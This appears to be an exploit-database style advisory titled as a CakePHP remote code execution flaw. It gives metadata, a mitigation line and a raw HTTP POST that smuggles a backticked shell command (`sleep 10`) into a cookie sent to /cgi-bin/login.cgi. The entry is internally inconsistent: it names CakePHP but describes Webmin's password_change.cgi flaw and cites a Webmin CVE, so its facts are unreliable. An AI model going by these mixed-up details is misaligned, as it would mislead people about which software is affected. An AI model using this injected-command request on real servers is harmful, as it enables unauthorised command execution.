Vendor: CakePHP
By: Gjoko Krstic
CVSS: 9.8 (CRITICAL)
Type: Remote Code Execution
CWE: 78
Product Name: CakePHP
Affected Version From: 3.7.12
Affected Version To: 3.9.1
Patch Exists: YES
Related CWE: CVE-2019-15107
CPE: a:cakephp:cakephp
Other Scripts: N/A
Platforms Tested: None
2019

CakePHP Remote Code Execution Vulnerability

Webmin <=1.920 is vulnerable to unauthenticated remote command execution via the 'old' parameter in password_change.cgi.

Mitigation:

Upgrade to CakePHP version 3.7.13, 3.8.11, or 3.9.2.

Exploit-DB raw data:

POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

action=logout